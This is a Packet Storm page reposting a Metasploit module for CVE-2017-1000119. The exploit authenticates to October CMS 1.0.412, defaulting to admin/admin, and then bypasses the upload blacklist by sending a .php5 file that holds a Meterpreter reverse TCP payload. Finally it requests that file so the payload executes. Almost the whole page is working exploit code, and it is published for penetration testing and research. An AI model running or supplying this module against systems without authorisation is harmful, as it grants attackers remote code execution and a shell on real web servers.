exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

October CMS Upload Protection Bypass Code Execution

October CMS Upload Protection Bypass Code Execution
Posted Sep 6, 2019
Authored by Anti Rais, Touhid M.Shaikh, SecureLayer7.net | Site metasploit.com

This Metasploit module exploits an Authenticated user with permission to upload and manage media contents can upload various files on the server. Application prevents the user from uploading PHP code by checking the file extension. It uses black-list based approach, as seen in octobercms/vendor/october/rain/src/Filesystem/ Definitions.php:blockedExtensions(). This module was tested on October CMS version version 1.0.412 on Ubuntu.

tags | exploit, php
systems | linux, ubuntu
advisories | CVE-2017-1000119
SHA-256 | 018cfd6c1eb8529baff5fa0a0a5365e86412dcf24e53e0a9dac7f7b274f80338

October CMS Upload Protection Bypass Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'October CMS Upload Protection Bypass Code Execution',
'Description' => %q{
This module exploits an Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().
This module was tested on October CMS version v1.0.412 on Ubuntu.
},
'Author' =>
[
'Anti Räis', # Discovery
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
'SecureLayer7.net' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB','41936'],
['URL','https://bitflipper.eu/finding/2017/04/october-cms-v10412-several-issues.html'],
['CVE','2017-1000119']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'ENCODER' => 'php/base64',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'October CMS v1.0.412', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 25 2017'))

register_options(
[
OptString.new('TARGETURI', [ true, "Base October CMS directory path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
])
end

def uri
return target_uri.path
end

def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'modules', 'system', 'assets', 'js', 'framework.js')
})
rescue
vprint_error('Unable to access the /assets/js/framework.js file')
return CheckCode::Unknown
end

if res && res.code == 200
return Exploit::CheckCode::Appears
end

return CheckCode::Safe
end

def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
'method' => 'GET'
})

if res.nil?
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end

/name="_session_key" type="hidden" value="(?<session>[A-Za-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine Session Key") if session.nil?

/name="_token" type="hidden" value="(?<token>[A-Za-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine token") if token.nil?
vprint_good("Token for login : #{token}")
vprint_good("Session Key for login : #{session}")

cookies = res.get_cookies
vprint_status('Trying to Login ......')

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'backend', 'backend', 'auth', 'signin'),
'cookie' => cookies,
'vars_post' => Hash[{
'_session_key' => session,
'_token' => token,
'postback' => '1',
'login' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_a.shuffle]
})

fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

# if we redirect. then we assume we have authenticated cookie.
if res.code == 302
print_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
end
end


def exploit
cookies = login

evil = "<?php #{payload.encoded} ?>"
payload_name = "#{rand_text_alpha(8..13)}.php5"

post_data = Rex::MIME::Message.new
post_data.add_part("/", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="path"')
post_data.add_part(evil, content_type = 'application/x-php', transfer_encoding = nil, content_disposition = "form-data; name=\"file_data\"; filename=\"#{payload_name}") #payload
data = post_data.to_s

register_files_for_cleanup(payload_name)
vprint_status("Trying to upload malicious #{payload_name} file ....")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'backend', 'cms', 'media'),
'method' => 'POST',
'cookie' => cookies,
'headers' => { 'X-OCTOBER-FILEUPLOAD' => 'MediaManager-manager' },
'Connection' => 'close',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})

send_request_cgi({
'uri' => normalize_uri(uri, 'storage', 'app', 'media', payload_name),
'method' => 'GET'
})
end
end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close